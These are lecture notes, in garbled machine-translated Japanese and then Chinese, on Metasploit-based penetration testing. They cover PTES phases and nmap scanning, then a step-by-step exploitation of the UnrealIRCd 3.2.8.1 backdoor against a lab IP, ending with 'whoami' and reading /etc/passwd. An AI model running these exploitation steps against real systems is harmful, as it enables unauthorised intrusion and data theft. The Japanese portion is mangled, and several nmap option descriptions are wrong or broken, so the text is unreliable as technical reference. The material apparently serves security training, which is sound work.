Metasploitの高度な講義 攻撃コマンドのプロセスと導入
01.侵入テストプロセスリンク(PTES )
1. 相互作用の初期段階:クライアント組織とのインタラクティブな議論が範囲を決定するために、目標など
2. 情報収集の段階:ターゲット組織の詳細については、Nmapの、Nessusは、など
3. 脅威モデリングフェーズ:最も実行可能なチャネル攻撃を決定するために、物事を整理します
4. 脆弱性分析フェーズ:コード検索利用可能なリソースの浸透
5. 侵入攻撃フェーズ:セキュリティの脆弱性を識別し、侵入システム
6. あなたがしたい、:侵入アタックフェーズ後Mctcrprctcr
7. レポートステージ:侵入テストレポート
02. Metasploitのは、リンクを利用します
情報収集の段階
周辺情報検索 - Googleのハッキングなど
検出とポートスキャンや他の-Nmapホスト
サービススキャン-auxiliary /スキャナ/ tclnet / ...など(ディレクトリを参照してください)
ネットワーク脆弱性スキャン-OpenVAS、Nessusは、など
情報収集の段階-Nmap
フォーマット:nmapの<スキャンオプション、<スキャン対象>
•スキャンオプション:スキャン方法スキャンの目標を指定します。
-sn - 生存ホストを探査、ポートスキャンは、単一のpに対応していません。
-o - カンマで分けたp複数のアドレスを識別するために、ターゲット・オペレーティング・システム、(、)
( - ) - -sVハイフンと継続的なサービスのIPアドレスの詳細なバージョン情報、
-f - 高速走査CIDR表記、192.168.22.0 / 24
-sT / -sS / -sA - フル接続/ SYNスキャン/ ACKスキャン、
補助/スキャナ/ポートスキャン/ ..モジュール付き
-sU -udpポートスキャン
-p <ポート範囲>は、ポートスキャンを指定します。
...
Nmapの-O -sV 192.168.24.139
ステータス:
アプリケーションが待機している。このポートを開きます
ホストに応答して閉じ、何のアプリケーションがリッスンしていません
必ず開いているかどうかをフィルタ処理
ポートが開いているかどうかを判断することができませんでしフィルタリングされていない(場合にのみ、ACKスキャン表示されます)
nmapの-A -p 6667 192.168.24.139
情報収集段階- 他のジェスチャ
脆弱性分析フェーズ
IRC:略語、インターネットリレーチャット、リアルタイムのコミュニケーションツールのネットワーク「インターネットはチャットを任せ」。
IRCは動作します:構造体が分散クライアント/サーバーで、IRCサーバは、同様の複数の内部IRCチャンネル、これらのチャネルおよびQQのグループが含まれています。チャネルは、チャネルなしチャネルを予約されていない場合、チャネルは消え、チャンネルに参加したいチャンネル名が存在しない場合は、このチャネルが作成され、管理者の作成者、内部チャネルをささやくことができます。
IRCポート:サーバポート:6667、クライアントポート:6697は、SSLを使用して接続されています。
1.msfconsole -启动metasploit框架
2.search unreal ircd3.2.8.1 -在metasploit框架中查询相关模块
3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor -查看模块信息,命名规则:模块类型/目标平台/目标服务/模块名称
4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb -查看源代码(也可在目录中查看)
渗透攻击阶段
1.use exploit/unix/irc/unreal_ircd_3281_backdoor -使用该模块
2.show options -查看需配置的参数(Required为yes的选项必须配置)
3.set rhosts 192.168.24.139 -配置目标ip地址
4.run/exploit -运行该模块
5.whoami;cat/etc/passwd -成功后查看目标主机信息
Metasploit漏洞利用流程总结
Metasploit命令:
1. msfconsole
2. search相关模块
3. use模块路径
4. show options
5.set <参数名称> <参数信息
6.run/exploit
7..